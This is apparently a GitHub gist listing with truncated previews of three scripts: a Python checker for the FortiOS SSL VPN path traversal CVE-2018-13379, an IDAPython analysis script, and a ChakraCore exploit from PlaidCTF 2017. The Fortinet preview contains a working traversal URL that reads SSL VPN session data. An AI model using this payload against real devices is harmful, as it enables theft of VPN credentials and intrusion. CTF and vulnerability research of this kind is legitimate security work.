vbty
/ CVE-2018-13379.py
Created
May 29, 2023 03:33
CVE-2018-13379 : A path traversal vulnerability in the FortiOS SSL VPN web portal
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests, binascii, optparse | |
| from urlparse import urlparse | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| requests.packages.urllib3.disable_warnings() | |
| import multiprocessing | |
| def checkIP(ip): | |
| try: | |
| url = "https://"+ip+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" |
vbty
/ ida-analysis.py
Created
October 14, 2021 11:08
— forked from geekman/ida-analysis.py
simple IDAPython script for scripting automated binary analysis
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # ida-analysis.py | |
| # a simple IDAPython binary analysis script | |
| # 2020.05.24 darell tan | |
| # | |
| # invoke with: | |
| # idat64 -c -A -S"ida-analysis.py $HOME/analysis.txt" <file.bin> | |
| # | |
| import sys |
vbty
/ exploit.js
Created
March 1, 2018 01:44
— forked from eboda/exploit.js
Exploit for Chakrazy challenge from PlaidCTF 2017 - ChakraCore exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //////////////////////////////////////////////////////////////////////////// | |
| // | |
| // The vulnerability was that the following line of code could change the type of the | |
| // underlying Array from JavascriptNativeIntArray to JavascriptArray: | |
| // | |
| // spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE; | |
| // | |
| // As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed | |
| // was removed. If the aItem then is not a JavascriptArray, the following code path is taken: | |
| // else |